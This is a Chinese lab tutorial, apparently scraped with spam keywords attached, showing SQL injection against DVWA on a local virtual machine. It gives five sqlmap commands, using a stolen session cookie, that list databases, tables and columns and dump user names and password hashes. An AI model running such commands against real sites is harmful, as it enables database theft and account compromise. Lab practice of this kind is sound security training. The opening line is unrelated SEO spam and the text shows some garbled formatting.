免费个人网站2018,北京建站系统模板,seo在线优化系统,郑州网站建设找汉狮0.测试准备
1#xff09;打开Kali虚拟机终端; 2#xff09;打开靶机OWASP#xff0c;并通过浏览器#xff0c;输入IP地址进入dvwa的主页#xff0c;然后选择SQL injection进入SQL注入的测试页面
1.获取DVWA的url和cookie
在输入框中输入1#xff0c;显示有内容…0.测试准备
1打开Kali虚拟机终端; 2打开靶机OWASP并通过浏览器输入IP地址进入dvwa的主页然后选择SQL injection进入SQL注入的测试页面
1.获取DVWA的url和cookie
在输入框中输入1显示有内容此时利用此URL进行SQL注入。 输入document.cookie获取页面的cookie。去除remem_token字段的内容用于下文的sql注入终端的cookie。
3.在终端开始测试
1终端中输入指令一 sqlmap -uhttp://192.168.134.129/dvwa/vulnerabilities/sqli/?id1SubmitSubmit# --cookie “securitylow; PHPSESSIDlcph9vq217i7bkio8piu6h5td2” --dbs 结果如下说明找到了连个数据库dvwa和information_schema接下来获取数据库dvwa 中的表格。 2在终端中输入指令二 sqlmap -uhttp://192.168.134.129/dvwa/vulnerabilities/sqli/?id1SubmitSubmit# --cookie “securitylow; PHPSESSIDlcph9vq217i7bkio8piu6h5td2” -D dvwa --tables 结果如下发现有两个表格guestbook和users接下来获取users数据表中有哪些列。 3在终端中输入指令三 sqlmap -uhttp://192.168.134.129/dvwa/vulnerabilities/sqli/?id1SubmitSubmit# --cookie “securitylow; PHPSESSIDlcph9vq217i7bkio8piu6h5td2” -D dvwa -T users --columns 结果如下说明users一共有六列接下来获取具体内容 4在终端中输入指令四有提示信息则输入y sqlmap -uhttp://192.168.134.129/dvwa/vulnerabilities/sqli/?id1SubmitSubmit# --cookie “securitylow; PHPSESSIDlcph9vq217i7bkio8piu6h5td2” -D dvwa -T users --dump 结果如下表格中的数据即显示。 5若数据库中数据较多可在终端中输入指令五只输出用户名和密码字段 sqlmap -uhttp://192.168.134.129/dvwa/vulnerabilities/sqli/?id1SubmitSubmit# --cookie “securitylow; PHPSESSIDlcph9vq217i7bkio8piu6h5td2” -D dvwa -T users -C “user,password” --dump 结束